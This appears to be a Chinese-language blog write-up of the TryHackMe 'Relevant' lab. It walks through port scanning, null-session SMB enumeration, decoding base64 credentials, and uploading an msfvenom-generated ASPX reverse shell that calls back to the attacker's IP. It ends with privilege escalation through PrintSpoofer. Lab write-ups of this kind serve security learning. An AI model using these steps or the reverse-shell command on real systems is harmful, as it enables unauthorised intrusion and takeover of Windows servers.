0%

THM打靶日寄9-Relevant

  • 扫描打点

    80 端口是一个 IIS10.0 ,扫了下网站啥都没有

    这个b靶机÷完了,坐了一天牢发现是 nmap 命令不对,然后就这样,扫出来不同结果:

    扫出来多余三个端口,在针对这几个端口详细扫描:

    然后我详细信息又扫不出来了:

    睡了一觉又出来了,可能是靶机的问题:

    看到 49663 也有 IIS 服务器,继续扫一下看看,只找到一个空的目录:

    这里有个要注意的地方,用 gobustermedium 字典是能扫出来东西的(大概扫了有 $40$ 分钟吧,很难想象实战中该怎么办):

    /nt4wrksv

    然后根据 wp 可以用 nmap--script=vuln 参数来用脚本扫描,扫了 $20$ 分钟后看到有永恒之蓝

    但让尽可能不用 msf 就先不用了

    那就先裸连一下 smb 好了 连是连不上,但是可以空密码列举共享的资源:

    看到了一个奇怪的东西,连一下试试:

    文件内容是:

    1
    2
    3
    [User Passwords - Encoded]
    Qm9iIC0gIVBAJCRXMHJEITEyMw==
    QmlsbCAtIEp1dzRubmFNNG40MjA2OTY5NjkhJCQk

    这个等号看着像 base64

    1
    2
    Bob - !P@$$W0rD!123
    Bill - Juw4nnaM4n420696969!$$$

    当然这个也可以从浏览器访问到:

  • smb 传反弹 shell

    现在基础的工作已经做完了,目前有两个人的账号密码,smb 特定目录的文件权限且该目录能从浏览器访问到

    账密目前不能登录 smb ,而且传反弹 shell 的条件已经全了,就先传 shell 上去。

    这里不能用 msf 就用正常的反弹了

    这里刚刚看 smb 文件的时候好像没正常断开导致 smb 连不上了,所以后面的靶机 ip 又改了(大嘘

    注意这个是 windows 的,别拿那个blinux的反弹 shell 传了,还有要生成 .aspx 的反弹 shell 而非 .asp ,原因是 aspx 会使用 ASP.NET 引擎来运行

    1
    msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.11.99.99 LPORT=443 -f aspx -o windows_rev_443.aspx

    dir /s /b c:\ | find "user.txt"

  • PrintSpoofer 实现 Windows 提权

    这里由于不能用 msf 就传不了 PowerUp ,仿照 Alfred 里面看下 whoami /priv

    中间这个 SeImpersonatePrivilegeAlfred 里面被用来模拟用户 token ,但那次是用 msf 做的,这次要手动做了

    这里下载PrintSpoofer.exe并传上去

    根据所说的,执行 PrintSpoofer.exe -i -c cmd

    /users/administrator/Desktop 找到 root.txt

啊不对啊我草,刚刚的账号密码怎么没用到

看了一圈也没有利用到这个的,可能只是用来转移视线的